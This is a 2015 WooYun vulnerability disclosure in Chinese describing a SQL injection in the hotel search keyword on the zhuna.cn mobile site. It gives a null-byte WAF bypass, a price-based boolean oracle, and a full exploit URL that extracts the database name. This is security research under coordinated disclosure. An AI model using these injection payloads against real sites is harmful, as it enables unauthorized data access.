漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0107520
漏洞标题:住哪儿某站前台绕过WAF注入(论注入语句的构造)
相关厂商:住哪网
漏洞作者: BMa
提交时间:2015-04-12 21:26
修复时间:2015-05-27 22:04
公开时间:2015-05-27 22:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-12: 细节已通知厂商并且等待厂商处理中
2015-04-12: 厂商已经确认,细节仅向厂商公开
2015-04-22: 细节向核心白帽子及相关领域专家公开
2015-05-02: 细节向普通白帽子公开
2015-05-12: 细节向实习白帽子公开
2015-05-27: 细节向公众公开
简要描述:
住哪儿某站前台绕过WAF注入(论注入语句的构造)
构造好辛苦
详细说明:
站点:http://m.zhuna.cn
在酒店预定的酒店名称处存在注入
得到如下信息:
Filename: /var/wwwroot/testwap/wap/models/index_model.php
select * from (select ID,HotelName,cityname,eareaname,address,XingJi,Min_Jiage,Max_Jiage,df_haoping,x,y,CBD,dbo.baidu_juli(39.998688179804,116.34375398973,baidu_lat,baidu_lng) as juli, px_dingdan ,dbo.compare(1,1,day10) as day10_isfull ,ROW_NUMBER() OVER ( ORDER BY dbo.compare(1,1,day10) desc, dbo.baidu_juli(39.998688179804,116.34375398973,baidu_lat,baidu_lng), px_dingdan DESC, id DESC ) as rowslist from hotelinfo where ecityid = 0101 and shenhe = 1 AND (lat between 39.948688179804 and 40.048688179804) and (lng between 116.29375398973 and 116.39375398973 ) AND Min_Jiage >= 0 and hotelname like '%'%' and x is not null and y is not null ) as a where a.rowslist > 0 and a.rowslist <= 10
接下来就是构造注入语句:
构造注入语句如下:
%' and 1=1 and '%'='
提示存在危险字符:
修改注入语句绕过:
%' an%00d 1=1 an%00d '%'='
接下来发现1=1,1=2,‘A’='A'等都不能作为判定条件<查询返回相同,都是查不到结果,很奇怪>,然后尝试构造时间延迟,报错注入等,要么提示语法错误,要么提示不是built-in function,
现在的问题是找到一个判断条件,来对输出的结果进行判定,这个判断条件来自哪里呢?
这时候看到有一个酒店价格,选中搜索一下,
SQL语句中多了一句:
AND Min_Jiage <= 150
价格大于150的,是数字,那么可以找到一个价格,返回唯一的值,即可作为判断条件,这里将酒店价格选择不限,然后在注入语句中插入该查询条件,
找到一个合适的价格,只返回唯一的值
AND Min_Jiage = 600
继续构造:
%' an%00d Min_Jiage = (ascii(substring(db_name(),1,1))+496) an%00d '%'='
http://m.zhuna.cn/wap/index.php/index/hotelSearch?city=bj&tm1=2015-04-12&day=1&position=%E4%BA%94%E9%81%93%E5%8F%A3&keyword=%25%27+an%2500d+Min_Jiage+%3D+%28ascii%28substring%28db_name%28%29%2C1%2C1%29%29%2B496%29+an%2500d+%27%25%27%3D%27&price=
漏洞证明:
说明db_name()的第一位为h,至此,有了判定条件,最后得到数据库名为:db_name()=hotel_9tour_cn
修复方案:
版权声明:转载请注明来源 BMa@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-04-12 22:03
厂商回复:
非常感谢您反馈的信息,相关问题已提交技术处理。
最新状态:
暂无